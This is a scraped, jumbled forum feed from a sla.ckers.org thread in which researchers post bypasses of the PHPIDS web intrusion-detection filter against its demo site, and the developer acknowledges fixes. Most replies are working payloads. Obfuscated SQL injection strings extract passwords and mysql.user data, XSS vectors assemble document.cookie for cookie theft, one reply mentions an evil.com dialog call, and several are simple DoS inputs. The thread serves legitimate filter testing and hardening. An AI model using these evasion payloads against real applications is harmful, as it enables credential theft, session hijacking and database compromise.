PHPIDS 0.6.5 Hi! I am currently creating a webapp IDS which should be capable to detect incoming parameters as malicious and react in certain kind of ways - depending on the parameter, it's severity etc. The IDS is not supposed to strip - just to recognize and log/warn the attempting user. I have created a filter set and I would be happy to hear your opinion on that. First of all - this is the current full filter string: (["|'][\s]*\>)|(["|'][\s]*\ http://sla.ckers.org/forum/read.php?12,30425,30425#msg-30425 Wed, 19 Jun 2013 03:51:52 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?12,30425,42188#msg-42188 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,42188#msg-42188 '||(true)#1'
'||true#'

'=true
UNION#
#
#
#original_by_lightos
SELECT \N,group_concat(password)#
##
/*!FROM*/ users WHERE '1]]> Reiners Projects Wed, 18 Jan 2012 14:18:13 -0600 http://sla.ckers.org/forum/read.php?12,30425,37804#msg-37804 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,37804#msg-37804 DebugZer0 Projects Tue, 13 Dec 2011 06:46:00 -0600 http://sla.ckers.org/forum/read.php?12,30425,36946#msg-36946 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36946#msg-36946 Reiners Projects Tue, 23 Aug 2011 07:20:35 -0500 http://sla.ckers.org/forum/read.php?12,30425,36944#msg-36944 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36944#msg-36944
Also you almost definitely thought of this ages ago but using a client side filter and checking server-side to see if it's been bypassed provides a way of detecting malicious users that probably has few false positives.]]> Albino Projects Tue, 23 Aug 2011 06:49:55 -0500 http://sla.ckers.org/forum/read.php?12,30425,36943#msg-36943 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36943#msg-36943 -------------------------------------------------------
> @hafif Haha - nice, showHelp() - so some people do
> read the MSDN :D Sorry for the very late reply.
> Just deployed a fix! Thanks!


:) Well I didn't. But now I did, so you might want to add showModelessDialog since it might enable information and cookie theft.
http://demo.phpids.org/?test=%0d%2ba%0d>>showModelessDialog(a(0).a%2ba(0).nodeName%2ba(0).b%2ba(0).c%2ba(0).nodeName.toLowerCase()%2ba(0).d%2ba(0).e);%0d'1';"1"="1";a="1\"\n<t%20id=a%20a=javascrip%20b=:confi%20c=rm(documen%20d=.coo%20e=kie)%20>1<<1\'1'1\"1";]]> hafif Projects Sun, 21 Aug 2011 19:52:52 -0500 http://sla.ckers.org/forum/read.php?12,30425,36862#msg-36862 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36862#msg-36862 Anonymous User Projects Tue, 02 Aug 2011 11:32:01 -0500 http://sla.ckers.org/forum/read.php?12,30425,36691#msg-36691 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36691#msg-36691
The next one is an upgrade of an older bypass. I added some evasions just to prove that we have no limitation. I had a hard time generating the letter t, finally I did it:

Works on IE.
http://demo.phpids.org/?test=%0d%2ba%0d>>showHelp(a(0).a%2ba(0).nodeName%2ba(0).b%2ba(0).c%2ba(0).nodeName.toLowerCase()%2ba(0).d%2ba(0).e);%0d'1';"1"="1";a="1\"\n<t id=a a=javascrip b=:confi c=rm(documen d=.coo e=kie) >1<<1\'1'1\"1";

//Notice we lose domain context... but still it has some nice stuff.]]> hafif Projects Wed, 06 Jul 2011 16:26:31 -0500 http://sla.ckers.org/forum/read.php?12,30425,36689#msg-36689 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36689#msg-36689 Anonymous User Projects Wed, 06 Jul 2011 09:48:33 -0500 http://sla.ckers.org/forum/read.php?12,30425,36636#msg-36636 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36636#msg-36636
str'=version()
UNION#
#
#
#
SELECT group_concat(table_name)#
##
/*!FROM*/ information_schema.tables WHERE '1]]> lightos Projects Wed, 29 Jun 2011 13:20:44 -0500 http://sla.ckers.org/forum/read.php?12,30425,36622#msg-36622 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36622#msg-36622 -------------------------------------------------------
> nice work hafif :)


Thanks :)

Here is one for Chrome and FF. using a popup.
http://demo.phpids.org/?test=showModalDialog%28%28/javascript/%28{a:/javascript/,b:1}.a%29%29%2b%28/:aler/%28{a:/:aler/,b:1}.a%29%29%2b%28/t.1.%2b1/%28{a:/t%281%29%2b1/,b:1}.a%29%29%29;

or you can just showModalDialog("http://evil.com"), but then you will lose the domain context (and you want it)

If popupblocker is on, it will block the script, if not the script will run.
Otherwise, clicking on the links and launching the "onclick" events, will cause script execution.

I am sure I can get it simplified... but I am to tired (it's 4 AM )]]> hafif Projects Tue, 28 Jun 2011 22:56:45 -0500 http://sla.ckers.org/forum/read.php?12,30425,36618#msg-36618 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36618#msg-36618 thornmaker Projects Tue, 28 Jun 2011 02:16:41 -0500 http://sla.ckers.org/forum/read.php?12,30425,36586#msg-36586 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36586#msg-36586
Again, priceless find! Fixed and thanks a lot.]]> Anonymous User Projects Sat, 25 Jun 2011 13:10:31 -0500 http://sla.ckers.org/forum/read.php?12,30425,36572#msg-36572 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36572#msg-36572 -------------------------------------------------------
> First of all:
> awesome finds! Some were caused by changes in PHP
> 5.3.x, some were plain bugs, one was a bug in the
> demo resulting from the server move - overall I
> had three locations to fix :)

THANKS :)

The following bypass was not so hard. And is using the shift operator <<.
The real challenge, which was extremely difficult was the fact that there are multiple onclick injection points which caused errors before the script tag is launched (It should be noted that this difficulty might be limited to the scope of the demo application).

But I managed to get everyone satisfied:
http://demo.phpids.org/?test=%0d%2ba%0d>>setTimeout(a(1).a%2ba(1).b%2ba(1).c,1000);%0d'1';"1"="1";a="1\"\n<a name=a a=con b=fi c=rm(120) >1<<1\'1'1\"1";

Works on IE.]]> hafif Projects Thu, 23 Jun 2011 21:25:08 -0500 http://sla.ckers.org/forum/read.php?12,30425,36554#msg-36554 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36554#msg-36554
It should be quite okay now - although I have a certain feeling that you might find more. About the DoS - I am not sure yet what to do about that. Will address it in a later release. Same for the links. Usually devs might wanna allow arbitrary HTTP(s) URLs - sometimes not. We should - as far as I can think now - include an option in the Config.ini.php to delegate the setting to the HTMLPurifier API we use under the hood.

Thanks again, great finds!
.mario]]> Anonymous User Projects Wed, 22 Jun 2011 16:58:07 -0500 http://sla.ckers.org/forum/read.php?12,30425,36500#msg-36500 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36500#msg-36500 Am I suppose to be able to inject a simple <a href> tag ?
This could be used for phising attacks.]]> hafif Projects Fri, 17 Jun 2011 15:57:49 -0500 http://sla.ckers.org/forum/read.php?12,30425,36499#msg-36499 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36499#msg-36499 Gareth Heyes Projects Fri, 17 Jun 2011 14:52:19 -0500 http://sla.ckers.org/forum/read.php?12,30425,36498#msg-36498 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36498#msg-36498
All browsers:
http://demo.phpids.org/?test=ale\rt%281%29

A more noticeable attack:
http://demo.phpids.org/?test=\%3C\/textarea%3E\%3C\script%3Ealer\t%281%29%3C\/\script%3E


I think, this is due to the removal of the '\' char...

The same technique can be use for other attacks.]]> hafif Projects Fri, 17 Jun 2011 13:22:09 -0500 http://sla.ckers.org/forum/read.php?12,30425,36497#msg-36497 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36497#msg-36497 BTW, very very nice book... couldn't stop reading !!!!

Your book said that IE will fail to handle NULL bytes, which leads me to the bypass with PHP. the rules are good enough to stop the attack on modsecurity.

What do you think about the DoS scenarios. They can be naughty if persistent injections are available.]]> hafif Projects Fri, 17 Jun 2011 12:07:03 -0500 http://sla.ckers.org/forum/read.php?12,30425,36482#msg-36482 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36482#msg-36482 Gareth Heyes Projects Tue, 14 Jun 2011 16:59:46 -0500 http://sla.ckers.org/forum/read.php?12,30425,36481#msg-36481 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36481#msg-36481 Anonymous User Projects Tue, 14 Jun 2011 15:42:04 -0500 http://sla.ckers.org/forum/read.php?12,30425,36480#msg-36480 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36480#msg-36480
Edit: http://demo.phpids.org/?test='uni\0on select 1-\0-\0+

Yikes!]]> lightos Projects Tue, 14 Jun 2011 14:26:06 -0500 http://sla.ckers.org/forum/read.php?12,30425,36467#msg-36467 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36467#msg-36467 Very nice configuration, but easy to pass on IE:

http://demo.phpids.org/?test=ale\0rt(kkk.v);\/\/<b name=kkk v=Hafif >

In addition, simple DoS are available in all browsers (though low impact)

http://demo.phpids.org/?test=location%2b%2b
http://demo.phpids.org/?test=%2b%2blocation
http://demo.phpids.org/?test=location%2b=1
.
.
.
And so on...]]> hafif Projects Sat, 11 Jun 2011 15:09:45 -0500 http://sla.ckers.org/forum/read.php?12,30425,36335#msg-36335 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36335#msg-36335 Anonymous User Projects Sun, 22 May 2011 16:54:35 -0500 http://sla.ckers.org/forum/read.php?12,30425,36239#msg-36239 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36239#msg-36239
1'and #
#aa
0 union#
#bb
select version()`

1'and #
#aa
0 union#
#bb
select (select `user` from#
#cc
mysql.user limit 1)'

Will leave it at that for now.]]> lightos Projects Sat, 16 Apr 2011 21:44:30 -0500 http://sla.ckers.org/forum/read.php?12,30425,36238#msg-36238 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36238#msg-36238 Anonymous User Projects Sat, 16 Apr 2011 11:40:47 -0500 http://sla.ckers.org/forum/read.php?12,30425,36208#msg-36208 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36208#msg-36208
1' and #aa
#bb
version() like trim(0x3520)'

1'and #
#aa
0 union#
#bb
select `user`u#
#cc
from mysql.user ']]> lightos Projects Mon, 11 Apr 2011 02:30:29 -0500 http://sla.ckers.org/forum/read.php?12,30425,36201#msg-36201 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36201#msg-36201 Anonymous User Projects Sun, 10 Apr 2011 10:57:02 -0500 http://sla.ckers.org/forum/read.php?12,30425,36198#msg-36198 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36198#msg-36198 Almost hurts to see this one get fixed.

null' or @:=(select all user'' from mysql . user limit 1) union#
#
select @'

http://demo.phpids.org/?test=null' or @:=(select all user'' from mysql . user limit 1)union%23%0A%23%0Aselect @']]> lightos Projects Sun, 10 Apr 2011 09:34:53 -0500 http://sla.ckers.org/forum/read.php?12,30425,36154#msg-36154 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36154#msg-36154 Anonymous User Projects Sat, 02 Apr 2011 10:49:34 -0500 http://sla.ckers.org/forum/read.php?12,30425,36126#msg-36126 Re: PHPIDS 0.6.5 http://sla.ckers.org/forum/read.php?12,30425,36126#msg-36126
fo"o'or'1]]> Reiners Projects Wed, 30 Mar 2011 11:32:01 -0500